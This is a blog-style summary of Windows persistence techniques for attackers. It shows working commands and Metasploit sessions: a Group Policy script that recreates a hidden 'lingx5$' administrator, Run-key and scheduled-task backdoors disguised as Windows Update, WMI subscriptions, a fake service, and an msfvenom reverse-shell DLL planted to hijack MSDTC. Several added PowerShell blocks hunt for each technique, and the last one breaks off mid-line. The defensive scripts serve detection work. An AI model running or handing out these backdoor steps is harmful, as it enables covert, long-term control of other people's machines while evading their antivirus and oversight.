
Windows Persistence Summary

Views: 570 / 2024-08-27 19:19:30

Windows persistence

I. File level

1) attrib

Use the attrib +s +a +h +r command:

  • +s: sets the System attribute
  • +a: sets the Archive attribute
  • +h: sets the Hidden attribute
  • +r: sets the Read-only attribute

attrib +s +a +h +r c:\test

After the command runs, Explorer no longer shows the test directory, but it still exists and can be opened by typing its path. Because it now carries both the System and Hidden attributes, Explorer treats it as a protected operating-system file and keeps hiding it even when "Show hidden files" is enabled; on the command line, dir /a still lists it.

If you want to see it again, remove the attributes with the same command using - instead of +.

The test folder shows up again.

2) System icon hiding

Rename the folder to My computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}. The part after the dot is the CLSID of a shell object, written directly after the dot with no space.

The folder's icon becomes the My Computer icon, and double-clicking it opens My Computer rather than the folder's contents.

The folder is still visible on the command line, and its contents can still be listed and opened from there.

Common folder names:

My computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Recycle Bin.{645ff040-5081-101b-9f08-00aa002f954e}
Dial-Up Networking.{992CFFA0-F557-101A-88EC-00DD010CCC48}
Printers.{2227a280-3aea-1069-a2de-08002b30309d}
Control Panel.{21ec2020-3aea-1069-a2dd-08002b30309d}
Network Neighborhood.{208d2c60-3aea-1069-a2d7-08002b30309d}

3) Malformed names

Create a directory named test...\ ; its displayed name is test...

The directory itself is visible, but the files inside it cannot be opened or deleted from Explorer: Win32 path normalisation strips trailing dots, so the name Explorer asks the file system for no longer matches the name actually stored on disk.

md test...\
copy  test...\

Deleting it from the graphical interface reports that the item cannot be found.

Opening a file inside it produces an error and the contents are not shown.

The way to remove it is to run rd /s /q c:\test...\ (a path written with the \\?\ prefix, which bypasses normalisation, also reaches it):

  • /s deletes the files in the specified directory and all of its subdirectories recursively.
  • /q quiet mode: delete without prompting for confirmation.

rd /s /q c:\test...\

4) Driver-level file hiding

The typical sign of driver-level hiding is the presence of the following files on the system drive:

c:\WINDOWS\
c:\WINDOWS\
c:\WINDOWS\
c:\WINDOWS\system32\drivers\

Driver-level hiding can be done with EasyFileLocker.

Download link: /s/1h2_k1picYeinpz3XtI8ypA?pwd=141d

Extraction code: 141d

Select the attributes to enable hiding of the files.

To remove it:

  1. Query the service status: sc qc xlkfs
  2. Stop the service: net stop xlkfs (once the service stops, the driver-hidden files reappear)
  3. Delete the service: sc delete xlkfs
  4. Delete the files under the system directory and reboot to make sure the service has really been cleaned up.
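The following PowerShell script is an added example, not code from the original post. It hunts for the three file-level tricks above (System+Hidden attributes, CLSID-suffixed names, trailing-dot names) under a chosen directory tree and then checks whether the xlkfs driver service the post names is registered. The scan root is an assumption; run it from an elevated PowerShell 5.1 or later prompt.

```powershell
# Added example (not from the original post): hunt for file-level hiding tricks and the xlkfs driver.
# Assumption: $Root is the directory tree to scan; scanning a whole system drive takes a while.
$Root = "$env:SystemDrive\Users"

# Shell-object CLSID appended to a folder name, e.g. "My computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
$clsidSuffix = '\.\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$'

# -Force lists Hidden/System entries that a plain Get-ChildItem (like Explorer) would skip.
$findings = Get-ChildItem -LiteralPath $Root -Force -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        $why  = @()
        $attr = $_.Attributes
        if ($attr.HasFlag([IO.FileAttributes]::Hidden) -and $attr.HasFlag([IO.FileAttributes]::System)) {
            $why += 'hidden+system (attrib +s +h)'          # Explorer treats these as protected OS files
        }
        if ($_.Name -match $clsidSuffix) { $why += 'CLSID-suffixed name (shell icon disguise)' }
        if ($_.Name -match '\.$')        { $why += 'trailing dot (unreachable through Win32 path normalisation)' }
        if ($why) {
            [pscustomobject]@{ Path = $_.FullName; Attributes = $attr; Why = ($why -join '; ') }
        }
    }
$findings | Format-Table -AutoSize

# Driver-level hiding leaves a kernel driver service behind; look for the one the post names.
$drv = Get-CimInstance Win32_SystemDriver -Filter "Name='xlkfs'" -ErrorAction SilentlyContinue
if ($drv) { "Driver service present: $($drv.Name) state=$($drv.State) path=$($drv.PathName)" }
else      { 'No xlkfs driver service registered.' }
```

Expect some noise from the first check: desktop.ini, $Recycle.Bin and similar legitimate items carry System+Hidden too, so treat the Why column as a triage hint and look at the path. Files hidden by a minifilter driver will not appear in this listing at all while the driver is loaded, which is why the script ends by checking the driver service rather than the files.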

II. Group Policy

A Group Policy backdoor is more insidious still: the script runs automatically whenever the computer performs the corresponding operation, for example a shutdown.

@echo off
net user lingx5$ 1234 /add
net localgroup administrators lingx5$ /add
exit

Save this as a batch file and register it as a shutdown script.

The script adds a user lingx5$ with password 1234 and puts it into the administrators group. An account whose name ends in $ is what is commonly called a shadow (hidden) user: net user does not list names ending in $, so an ordinary user is unlikely to notice it (it is still visible in lusrmgr.msc and to Get-LocalUser). Even if the account is found and deleted, the injected policy runs again at the next shutdown and recreates it.

Win+R, open the Local Group Policy Editor (gpedit.msc) and go to Computer Configuration > Windows Settings > Scripts (Startup/Shutdown).

In the Shutdown properties, add the script.

Restart the computer.

The user was added successfully and does not appear in the output of net user.

Group Policy can do more than add users: an attacker can also run arbitrary malicious scripts or programs through it, capture the administrator's password, and so on.
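As an added example (not part of the original post), the PowerShell below shows where the local Group Policy shutdown script from this section ends up and how to list the $-suffixed account it creates without relying on net user. It assumes Windows 10 / Server 2016 or later (for Get-LocalUser and Get-LocalGroupMember) and an elevated prompt.

```powershell
# Added example (not from the original post): find local GPO startup/shutdown scripts and "$" accounts.
$gpScripts = Join-Path $env:SystemRoot 'System32\GroupPolicy\Machine\Scripts'

# Local GPO scripts are registered in scripts.ini (cmd/batch) and psscripts.ini (PowerShell).
# Both files carry the Hidden attribute, so use -Force and a direct existence check.
foreach ($ini in 'scripts.ini', 'psscripts.ini') {
    $path = Join-Path $gpScripts $ini
    if ([IO.File]::Exists($path)) {
        "==== $path"
        Get-Content -LiteralPath $path -Force    # [Startup]/[Shutdown] sections with NCmdLine= / NParameters= entries
    }
}

# The script bodies themselves live under Machine\Scripts\Startup and Machine\Scripts\Shutdown.
"==== Script files under $gpScripts"
Get-ChildItem -LiteralPath $gpScripts -Recurse -Force -File -ErrorAction SilentlyContinue |
    Select-Object FullName, Length, LastWriteTime

# net user skips names ending in "$"; the SAM-backed cmdlets do not.
"==== Local accounts whose name ends in `$"
Get-LocalUser | Where-Object { $_.Name -like '*$' } |
    Select-Object Name, Enabled, LastLogon, PasswordLastSet

"==== Members of Administrators"
Get-LocalGroupMember -Group 'Administrators' | Select-Object Name, PrincipalSource
```

Per-user logon/logoff scripts live in the sibling User\Scripts folder under the same GroupPolicy directory, so check that tree too when hunting. Deleting the account alone does not help; the .ini entry and the script file have to go as well, otherwise the next shutdown recreates it exactly as the section describes.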

III. Registry

1) Add manually

The registry is also a common persistence location: it holds an enormous amount of information, so an entry placed there is much harder to spot and troubleshoot.

  • reg add: adds or modifies registry entries.
  • "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run": the registry path to operate on; this key stores the current user's auto-start programs.
  • /v localUser: the name of the value to add (can be anything).
  • /t REG_SZ: the value's data type is a string (REG_SZ).
  • /d "C:\Users\tmp\": the value's data, i.e. the path of the auto-start program (here our trojan or backdoor program).

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v localUser /t REG_SZ /d "C:\Users\tmp\"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v localUser /t REG_SZ /d "C:\Users\tmp\"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v localUser /t REG_SZ /d "C:\Users\tmp\"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v localUser /t REG_SZ /d "C:\Users\tmp\"

Run executes its entries at every logon of that user; RunOnce executes them once and then deletes the value. RunServices and RunServicesOnce are Windows 9x/Me keys that NT-based Windows ignores, so only the first two matter on current systems. HKEY_CURRENT_USER keys can be written without administrator rights; the HKEY_LOCAL_MACHINE equivalents apply to every user but require administrator rights.

Two additional registry locations let an attacker persist by executing arbitrary payloads or DLLs. These are processed at logon and require administrator-level privileges to write:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v localUser /t REG_SZ /d "C:\tmp\"

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v localUser /t REG_SZ /d "C:\tmp\"
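The following PowerShell is an added example, not code from the original post. It enumerates the autorun keys discussed above (including the WOW6432Node mirrors and the numbered RunOnceEx subkeys) and flags entries that launch from user-writable directories or through script hosts. The review pattern is an assumption for triage, not a detection verdict; reading these keys needs no elevation.

```powershell
# Added example (not from the original post): audit Run/RunOnce/RunOnceEx autorun entries.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
# RunOnceEx keeps numbered subkeys (0001, ...) whose values are commands, plus a Depend subkey listing DLLs.
$runKeys += Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx' -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object { $_.PSPath }

# Heuristic (assumption): paths a non-admin can write to, and script hosts / LOLBins commonly used as launchers.
$review = '\\Users\\|\\Temp\\|\\AppData\\|\\ProgramData\\|\\Public\\|wscript|cscript|mshta|powershell|rundll32|regsvr32'

$results = foreach ($key in $runKeys) {
    $item = Get-Item -LiteralPath $key -ErrorAction SilentlyContinue
    if (-not $item) { continue }                         # key absent (e.g. no RunOnceEx entries)
    foreach ($name in $item.GetValueNames()) {
        $data = [string]$item.GetValue($name)
        $flag = if ($data -match $review) { 'REVIEW' } else { '' }
        [pscustomobject]@{ Key = $item.Name; Value = $name; Command = $data; Flag = $flag }
    }
}
$results | Sort-Object Flag -Descending | Format-Table -AutoSize -Wrap
```

Run it once from an elevated prompt and once as the user you are investigating, because HKCU resolves to the caller's hive; a persistence entry written into another user's Run key only shows up when that user's hive is loaded.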

2) meterpreter persistence

a) persistence module

Meterpreter has modules that automate this. Once the machine has called back to our msf, use the exploit/windows/local/persistence module:

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) > set payload windows/x64/meterpreter/reverse_tcp 
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) > set session 1  
session => 1
msf6 exploit(windows/local/persistence) > set lhost 192.168.84.128
lhost => 192.168.84.128
msf6 exploit(windows/local/persistence) > set lport 4444
lport => 4444
msf6 exploit(windows/local/persistence) > set startup USER
startup => USER
msf6 exploit(windows/local/persistence) > run

[*] Running persistent module against DESKTOP-906JKQ3 via session ID: 1
[+] Persistent VBS script written on DESKTOP-906JKQ3 to C:\Users\lingx5\AppData\Local\Temp\
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svwTznRkXi
[+] Installed autorun on DESKTOP-906JKQ3 as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svwTznRkXi
[*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DESKTOP-906JKQ3_20240827.3418/DESKTOP-906JKQ3_20240827.
msf6 exploit(windows/local/persistence) > 

After backgrounding the session, the windows/local/persistence module is pointed at the session ID and configured; it writes a VBS script into the user's Temp directory and adds a Run registry value for it. With startup USER the value goes under HKCU and no elevation is needed; startup SYSTEM writes the HKLM key and requires elevated privileges.

Then just listen on kali and wait for the target to log in and connect back.

The drawback is that the dropped script is not our own AV-evading payload, so antivirus software kills it easily and the trojan never calls back.

b) persistence_exe module

meterpreter > background         
[*] Backgrounding session 1... 
msf6 exploit(multi/handler) > use post/windows/manage/persistence_exe
msf6 post(windows/manage/persistence_exe) > set session 1
session => 1
msf6 post(windows/manage/persistence_exe) > set rexepath /opt/win_exp/win_exp.exe
rexepath => /opt/win_exp/win_exp.exe
msf6 post(windows/manage/persistence_exe) > set rexename 
rexename => 
msf6 post(windows/manage/persistence_exe) > run

[*] Running module against DESKTOP-906JKQ3
[*] Reading Payload from file /opt/win_exp/win_exp.exe
[+] Persistent Script written to C:\Users\lingx5\AppData\Local\Temp\
[*] Executing script C:\Users\lingx5\AppData\Local\Temp\
[+] Agent executed with PID 2076
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dJggfAUjDAS
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dJggfAUjDAS
[*] Cleanup Meterpreter RC File: /home/kali/.msf4/logs/persistence/DESKTOP-906JKQ3_20240827.0058/DESKTOP-906JKQ3_20240827.
[*] Post module execution completed
msf6 post(windows/manage/persistence_exe) > 
rexepath points at the local AV-evading executable /opt/win_exp/win_exp.exe.

rexename is the name of the uploaded file (usually chosen to look like a system service name, which is harder to notice). The file is always dropped into the %TEMP% directory.

The downside is that you cannot choose the upload path, so the file is not well hidden.

For persistence I still recommend uploading the file with upload and adding the registry entries manually.

c) WMI Persistence

msf6 exploit(windows/local/wmi_persistence) > show options

Module options (exploit/windows/local/wmi_persistence):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   CALLBACK_INTERVAL   1800000          yes       Time between callbacks (In milliseconds). (Default: 1800000).
   CLASSNAME           UPDATER          yes       WMI event class name. (Default: UPDATER)
   EVENT_ID_TRIGGER    4624             yes       Event ID to trigger the payload. (Default: 4625)
   PERSISTENCE_METHOD  EVENT            yes       Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR)
   PROCESS_TRIGGER                      yes       The process name to trigger the payload. (Default: )
   SESSION             1                yes       The session to run this module on
   USERNAME_TRIGGER    BOB              yes       The username to trigger the payload. (Default: BOB)
   WAITFOR_TRIGGER     CALL             yes       The word to trigger the payload. (Default: CALL)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.84.128   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   DisablePayloadHandler: True   (no handler will be created!)

Parameter description:

  1. CALLBACK_INTERVAL: the interval between callbacks in milliseconds. The default is 1800000 (30 minutes), i.e. the persistent payload is triggered every 30 minutes.
  2. CLASSNAME: the name of the WMI event class; it identifies this persistence task on the target. The default is UPDATER; change it to something less conspicuous.
  3. EVENT_ID_TRIGGER: which event ID triggers the payload. The default is 4625 (a failed logon, a common entry in the Security log). It can be changed to another event ID, for example 4624 (a successful logon) as set above, to trigger the payload more flexibly.
  4. PERSISTENCE_METHOD: how the persistence is triggered:
    • EVENT: on an event ID (e.g. a failed logon).
    • INTERVAL: periodically (every CALLBACK_INTERVAL).
    • LOGON: when a user logs on.
    • PROCESS: when the specified process starts.
    • WAITFOR: when the trigger word is signalled with the Windows waitfor command.
  5. PROCESS_TRIGGER: only used when PERSISTENCE_METHOD is PROCESS; the name of the process to watch. The payload fires when that process starts; set it to any legitimate process you want to monitor.
  6. SESSION: the session ID to run the module on. Required.
  7. USERNAME_TRIGGER: only used when PERSISTENCE_METHOD is LOGON; the payload fires when this user logs on. The default is BOB; change it to a real username on the target.
  8. WAITFOR_TRIGGER: only used when PERSISTENCE_METHOD is WAITFOR; the word that triggers the payload. The default is CALL.

Payload options (windows/x64/meterpreter/reverse_tcp)

  1. EXITFUNC: how the payload exits:
    • process: the default; ends the current process on exit.
    • seh: exit via the Structured Exception Handling (SEH) mechanism.
    • thread: terminate only the current thread.
    • none: take no exit action.
  2. LHOST: the attacker's listening address, which the target connects back to (your local IP or VPS IP).
  3. LPORT: the attacker's listening port, which the target connects to.
  4. DisablePayloadHandler: when True, Metasploit does not start a handler for the payload; use this to avoid conflicts when another listener is already running.
Typical example:

use windows/local/wmi_persistence
set session 1
set persistence_method EVENT
set event_id_trigger 4624
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.84.128
set lport 4444
run

One thing to keep in mind: this module requires administrator access on the target, because creating permanent event subscriptions in the root\subscription namespace (and, for the EVENT method, reading the Security log) needs elevated rights. The subscription lives in the WMI repository rather than in a file or Run key, so it survives reboots and has to be hunted through WMI itself.
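As an added example (not part of the original post or the Metasploit module), the PowerShell below lists every permanent WMI event subscription on the host, which is exactly what wmi_persistence installs (an __EventFilter, an event consumer and a __FilterToConsumerBinding in root\subscription), and removes one by name. It assumes an elevated PowerShell 5.1 or later prompt; the UPDATER name in the usage comment is the module's default CLASSNAME.

```powershell
# Added example (not from the original post): enumerate and remove permanent WMI event subscriptions.
$ns = 'root\subscription'

function Get-WmiPersistence {
    $bindings = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue
    foreach ($b in $bindings) {
        # Filter and Consumer are object references; resolve them to read the WQL query and the payload.
        $filter   = Get-CimInstance -Namespace $ns -ClassName __EventFilter   | Where-Object { $_.Name -eq $b.Filter.Name }
        $consumer = Get-CimInstance -Namespace $ns -ClassName __EventConsumer | Where-Object { $_.Name -eq $b.Consumer.Name }
        # CommandLineEventConsumer carries CommandLineTemplate; ActiveScriptEventConsumer carries ScriptText.
        $payload = if ($consumer.CommandLineTemplate) { $consumer.CommandLineTemplate } else { $consumer.ScriptText }
        [pscustomobject]@{
            Filter       = $filter.Name
            Query        = $filter.Query
            ConsumerType = $consumer.CimClass.CimClassName
            Consumer     = $consumer.Name
            Payload      = $payload
        }
    }
}

function Remove-WmiPersistence {
    param([Parameter(Mandatory)][string]$Name)
    # Remove the binding first, then the filter and consumer that carry the same name.
    Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
        Where-Object { $_.Filter.Name -eq $Name -or $_.Consumer.Name -eq $Name } | Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventFilter   | Where-Object { $_.Name -eq $Name } | Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventConsumer | Where-Object { $_.Name -eq $Name } | Remove-CimInstance
}

Get-WmiPersistence | Format-List
# Remove-WmiPersistence -Name UPDATER      # the module's default CLASSNAME
```

A filter whose Query selects __InstanceCreationEvent on Win32_NTLogEvent with an EventCode of 4624 or 4625, bound to a script consumer, is the EVENT method from the table above. On Windows 10 and later the Microsoft-Windows-WMI-Activity/Operational log also records event ID 5861 when such a binding is created, which gives a timeline for the installation.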

d) Adding users

post/windows/manage/add_user creates a local user (and can place it in a group such as Administrators) to come back through later.

use post/windows/manage/add_user
set session 1
set USER test
set PASS 1234
run

I only have normal user permissions here, so the user was not added.

You need the right to add users (local administrator) for this to succeed.

e) Creating a service

The persistence_service module creates a new service for persistence:

use exploit/windows/local/persistence_service

set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.84.128
set LPORT 4444
set REMOTE_EXE_NAME 
set SERVICE_NAME WindowsUpdateService
set SERVICE_DISPLAY_NAME "Windows Update Service"
set SERVICE_DESCRIPTION "Provides updates for the Windows operating system."
set STARTUP auto

run

Requires administrator privileges

IV. Scheduled tasks

Windows provides a utility, schtasks, that lets administrators run programs or scripts at specific dates and times, and attackers use it as a persistence mechanism. Creating a scheduled task that runs as the current user does not require administrator rights; with elevated rights, a task can additionally run as SYSTEM or another account and be triggered at user logon, at boot or when the machine is idle.

SCHTASKS is the built-in Windows command-line tool for creating, deleting and managing scheduled tasks.

schtasks /create /tn "Windows Update Service" /tr "C:\Windows\System32\" /sc onlogon /ru "SYSTEM"

Parameter explanation:

  • /create: create a new task.
  • /tn "Windows Update Service": the task name (disguised here as "Windows Update Service").
  • /tr "C:\Windows\System32\": the program the task runs.
  • /sc onlogon: the trigger; here the task runs when a user logs on (other triggers are possible, e.g. /sc onstart at system startup).
  • /ru "SYSTEM": run the task as SYSTEM (used to get elevated execution; creating such a task requires an elevated prompt).

Common trigger conditions:

  • /sc minute (with /mo N): every N minutes.
  • /sc daily: once a day.
  • /sc onstart: at system startup.
  • /sc onlogon: when a user logs on.

Validation:

schtasks /query /tn "Windows Update Service"
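The PowerShell below is an added example, not code from the original post. It lists every scheduled task outside the \Microsoft\ tree with its principal, triggers and actions, and flags tasks that run elevated or execute from user-writable paths, which is how the disguised "Windows Update Service" task above would stand out. It assumes the ScheduledTasks module (Windows 8 / Server 2012 and later); the review pattern is a triage heuristic.

```powershell
# Added example (not from the original post): audit non-Microsoft scheduled tasks.
# Heuristic (assumption): user-writable paths and script hosts that often launch dropped payloads.
$review = '\\Users\\|\\Temp\\|\\AppData\\|\\ProgramData\\|\\Public\\|wscript|cscript|mshta|powershell|rundll32|regsvr32'

$tasks = Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' }
$rows = foreach ($t in $tasks) {
    $info = $t | Get-ScheduledTaskInfo
    # Trigger objects are MSFT_TaskLogonTrigger, MSFT_TaskBootTrigger, MSFT_TaskTimeTrigger, ...
    $triggers = ($t.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task', '' }) -join ','
    foreach ($a in $t.Actions) {
        $cmd  = "$($a.Execute) $($a.Arguments)".Trim()       # empty for COM-handler actions
        $flag = @()
        if ($t.Principal.UserId -match 'SYSTEM' -or $t.Principal.RunLevel -eq 'Highest') { $flag += 'elevated' }
        if ($cmd -match $review) { $flag += 'user-writable/LOLBin' }
        [pscustomobject]@{
            Task     = $t.TaskPath + $t.TaskName
            RunAs    = $t.Principal.UserId
            Triggers = $triggers
            Command  = $cmd
            LastRun  = $info.LastRunTime
            State    = $t.State
            Flag     = $flag -join ','
        }
    }
}
$rows | Sort-Object Flag -Descending | Format-Table -AutoSize -Wrap
```

Each task is also stored as an XML file under %SystemRoot%\System32\Tasks, so the file's creation time and the Security log event 4698 (task created, when object-access auditing is enabled) date the persistence even after the task has been renamed.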

V. Creating services

Services that are misconfigured can lead to privilege escalation, and they can also be used for persistence. Creating a new service requires administrator-level privileges and is not a covert technique, but in a red team operation against a company with immature threat detection it still works; organisations should build the SOC capability to identify even these basic techniques in malware.

sc create ServiceName binPath= "C:\Path\To\Your\" start= auto

  • ServiceName: choose an inconspicuous service name.
  • binPath=: the path of the backdoor program (sc requires the space after the = sign).
  • start=: the startup mode (auto starts the service at boot).

Note that a plain executable which never reports to the Service Control Manager is terminated by it shortly after start (error 1053), so the binary must either be a real service or a launcher that starts the payload and exits.

PowerShell creates a new service:

New-Service -Name "SystemUpdate" -BinaryPathName "C:\temp\" -Description "systemupdate" -StartupType Automatic

sc start SystemUpdate
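As an added example (not part of the original post), the PowerShell below audits installed services the way a defender would look for the SystemUpdate service created above: it extracts each service's binary from its PathName, checks whether it lives outside the Windows and Program Files trees, and verifies its Authenticode signature. It assumes an elevated PowerShell 5.1 or later prompt.

```powershell
# Added example (not from the original post): flag services with unusual binaries or bad signatures.
function Get-ServiceBinary([string]$PathName) {
    # PathName may be quoted ("C:\x y\a.exe" -arg) or unquoted (C:\Windows\system32\svchost.exe -k netsvcs).
    if ($PathName -match '^\s*"([^"]+)"')   { return $Matches[1] }
    if ($PathName -match '^\s*(\S+?\.exe)') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

# Directories where service binaries are expected (assumption; extend for your environment).
$trustedDirs = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }
$trusted = '^(' + (($trustedDirs | ForEach-Object { [regex]::Escape($_) }) -join '|') + ')\\'

$rows = foreach ($svc in Get-CimInstance Win32_Service) {
    $exe = Get-ServiceBinary $svc.PathName
    $sig = if ($exe -and (Test-Path -LiteralPath $exe)) { (Get-AuthenticodeSignature -FilePath $exe).Status } else { 'Missing' }
    $flag = @()
    if ($exe -notmatch $trusted) { $flag += 'outside trusted dirs' }
    if ($sig -ne 'Valid')        { $flag += "signature: $sig" }
    [pscustomobject]@{
        Name      = $svc.Name
        Display   = $svc.DisplayName
        StartMode = $svc.StartMode
        RunAs     = $svc.StartName
        Binary    = $exe
        Flag      = $flag -join '; '
    }
}
$rows | Where-Object Flag | Sort-Object Name | Format-Table -AutoSize -Wrap
```

Expect legitimate third-party agents installed outside Program Files to show up; the combination of an automatic start, a LocalSystem principal and an unsigned binary in a temp or user directory is the pattern worth escalating. System event 7045 (a service was installed) records when each entry appeared.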

VI. Memory shells

Memory shells (内存马, literally "memory horse") are a form of fileless attack. Fileless attacks evade traditional security software by executing code loaded directly into memory, residing in the registry, or abusing commonly whitelisted tools such as PowerShell, WMI and PsExec. They let an attacker gain access to a system and carry out follow-on activity: by combining exploits, legitimate tools, macros and scripts, the attacker can compromise a system, escalate privileges or spread laterally across the network. Because nothing is written to disk, they leave little trace after execution and are hard to detect and remove.

A memory shell never lands on disk, so file scanning and file-integrity monitoring miss it, which makes it hard to find and troubleshoot.

Principle

Memory injection:

  • A memory shell stays resident in memory without touching the disk by injecting code directly into the target process or by loading malicious classes and functions. This avoids disk-based detection such as antivirus scanning or file-integrity monitoring.

Hooking key components:

  • A memory shell intercepts, modifies or executes specific requests by hooking system APIs, web-server request-handling functions, or the core logic of an application framework. For example:
    • In web containers (Tomcat, JBoss, WebLogic), the memory shell registers a Servlet or Filter component that listens for HTTP requests and runs malicious logic when a specific request arrives.
    • In .NET environments, it may hook into the HTTP request-processing pipeline.

Categorisation

1. servlet-api type: dynamically register a new Listener, Filter or Servlet via code execution to obtain command execution and other functions. Framework- and container-specific memory shells work the same way, e.g. Spring controller memory shells and Tomcat valve memory shells.

2. Bytecode-enhancement type: use java instrumentation to modify existing code dynamically and obtain command execution and the like.

The common case is the Java memory shell, which relates to how Java processes a request:

  1. The client sends an HTTP request, say a GET.
  2. The Servlet container receives it and wraps it into HttpServletRequest and HttpServletResponse objects.
  3. The container calls the HttpServlet's init() method (only on the first request).
  4. The container calls the service() method.
  5. service() dispatches to doGet or doPost according to the request type; for a GET, doGet is called.
  6. doGet holds the application's own business logic.
  7. When that logic finishes, control returns to the container, which sends the result to the client.
  8. When the container shuts down, destroy() is called.

If malicious code is placed in doGet, the Servlet container loads it into memory, which is what memory-shell injection achieves.

Implementation

Take Tomcat's servlet-API memory shell as an example: create a malicious Servlet, obtain the current StandardContext, wrap the malicious Servlet in a Wrapper and add it to the children of the StandardContext, and finally add a ServletMapping that binds the access URL to the Wrapper.

The memory shell still has a drawback: as soon as the container or service is stopped and restarted, destroy() is called, the memory shell is gone and the JVM's garbage collector reclaims it.

VII. Hijacking backdoor

Introduction to MSDTC

The MSDTC process is the Microsoft Distributed Transaction Coordinator. It is called by products such as Microsoft Personal Web Server and Microsoft SQL Server and is used to coordinate transactions across multiple servers.
A distributed transaction is one that spans two or more databases, message queues, file systems or other transaction-protected resource managers; be careful when removing it.
The corresponding service is MSDTC, full name Distributed Transaction Coordinator, which Windows ships by default.

The corresponding process binary lives in %windir%\System32.

Principle

The attack starts when Windows starts the Microsoft Distributed Transaction Coordinator (MSDTC) service, which coordinates transactions across resource managers such as databases, message queues and file systems. Once the service starts, it reads the registry key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI

The MTxOCI component of MSDTC looks up three DLL names under that key and tries to load them from %SystemRoot%\System32. One of them is not shipped with Windows by default, so we write our own malicious DLL with that name and place it in %SystemRoot%\System32. Then we kill the MSDTC process remotely (taskkill /f /im ...) so that the service restarts; this time MSDTC finds the DLL and loads our backdoor. MSDTC runs as NT AUTHORITY\NetworkService, so the backdoor runs with that account's rights, and writing into System32 already requires administrator rights.

Implementation

Create a DLL:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.84.128 LPORT=4444 -f dll >

Upload the generated file to the target's C:\Windows\System32 directory:

upload  C:\Windows
shell
C:\Windows>move  c:\Windows\System32

Once it is in System32, restart the msdtc service:

taskkill /f /im 

Start msdtc again:

net start msdtc
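The PowerShell below is an added example, not code from the original post. It reads the MTxOCI key named above, reports for each referenced DLL whether it exists in System32 and carries a valid signature (an absent name is exactly the hijackable slot the technique relies on), and then lists modules inside the running MSDTC process that are unsigned or loaded from outside the Windows directory. It assumes an elevated PowerShell 5.1 or later prompt and that the process is named msdtc (the post elides the binary name; msdtc.exe is the assumption here).

```powershell
# Added example (not from the original post): check the MSDTC MTxOCI DLL search-order hijack.
$key  = 'HKLM:\SOFTWARE\Microsoft\MSDTC\MTxOCI'
$item = Get-Item -LiteralPath $key -ErrorAction SilentlyContinue
if (-not $item) { Write-Warning "$key not found"; return }

"==== DLL names MSDTC will try to load from System32"
foreach ($valueName in $item.GetValueNames()) {
    $dll = [string]$item.GetValue($valueName)
    if (-not $dll) { continue }
    $path    = Join-Path $env:SystemRoot "System32\$dll"
    $present = Test-Path -LiteralPath $path -PathType Leaf
    $sig = if ($present) { (Get-AuthenticodeSignature -FilePath $path).Status } else { 'absent (hijackable name)' }
    [pscustomobject]@{ Value = $valueName; Dll = $dll; Present = $present; Signature = $sig }
}

# A hijacking DLL that has already been loaded shows up as a module of the MSDTC process that is
# unsigned or loaded from outside the Windows directory (process name msdtc is an assumption).
"==== Suspicious modules in the running msdtc process"
Get-Process -Name msdtc -ErrorAction SilentlyContinue | ForEach-Object {
    $_.Modules | Where-Object {
        $_.FileName -notlike "$env:SystemRoot\*" -or
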